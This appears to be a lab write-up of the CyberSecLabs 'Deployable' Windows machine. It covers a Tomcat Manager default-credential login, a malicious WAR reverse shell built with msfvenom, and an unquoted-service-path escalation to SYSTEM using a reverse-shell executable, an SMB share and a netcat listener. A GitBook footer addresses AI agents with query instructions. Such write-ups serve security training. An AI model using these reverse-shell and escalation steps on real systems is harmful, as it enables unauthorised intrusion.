> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/windows/deployable.md).
# Deployable
## Nmap
```
sudo nmap 172.31.1.13 -p- -sS -sV
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```
## HTTPS
ON Port 8080 we have Apache Tomcat/7.0.88. With Tomcat you can access a file upload session under the 'Manager App' button on the right.
You will be presented with Http-basic-auth request box. Entering invalid credentials defaults to the page below.
The above page provides default credentials for admin:s3cret
If we try reloading the 'Manager App' page again and entering the credentials we are able to login with the defaults.
## Initial Foothold
I have completed some Tomcat based boxes before and find they are usually susceptible to malicious WAR file uploads. Further down the page we can see an opportunity to upload a WAR file.
msfvenom can be used to create malicious WAR files which essentially are Java based reverse shells that we can generate. I have linked an article below which goes over some ways to exploit a Tomcat server. I will be using the WAR backdoor method.
{% embed url="" %}
Run the following in a terminal.
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
```
After this has been generated we can upload the malicious file. We can now see the shell now appear in the application list.
Clicking on the shell will execute the reverse shell we created. Ensure you have a netcat listener running to catch the shell.
Once we execute the shell we should connect.
## Privilege Escalation
Using `whoami /priv` we can check our privileges:
'SeImpersonatePrivilege' is interesting and can potentially lead to JuicyPotato attacks. This is somewhat expected as this privilege is often given to service accounts in which we are likely running as.
the `systeminfo` command reveals we are running on Windows Server 2012 R2 Datacenter which is usually vulnerable to JuicyPotato attacks.
For now I will explore other attack vectors as I have covered this type of attack recently.
I next set up a SMB server on my attacking machine using Impacket's smbserver.py.
```
sudo python2 smbserver.py -smb2support Share /home/kali/scripts/windows/
```
We now should be able to execute and download files easily from inside the shell on the Server. I started with by running winPEAS.exe to identify in points of escalation.
After a while winPEAS.exe picks up that the Deploy service is which uses Deploy.exe in the following path at `C:\Program Files\Deploy Ready\Service Files\Deploy.exe` has no quotes and has spaces in the path
I have linked below a really good Medium article that explains the vulnerability really well. I have also shown a small snippet from the Article.
{% embed url="" %}
In this case I will create a reverse shell with `msfvenom` called `Service.exe` as this will be executed before the `Deploy.exe` file.
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > /home/kali/scripts/windows/Service.exe
```
I can then copy this over to the destination folder using the SMB server I set up earlier.
We can now set up a `netcat` listener on our attacking machine to the port of the `Service.exe` we created.
```
nc -lvp 4477
```
We need to then start the service for it to execute the Service.exe as System.
```
sc start Deploy
```
You should now have a shell as System.
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/windows/deployable.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.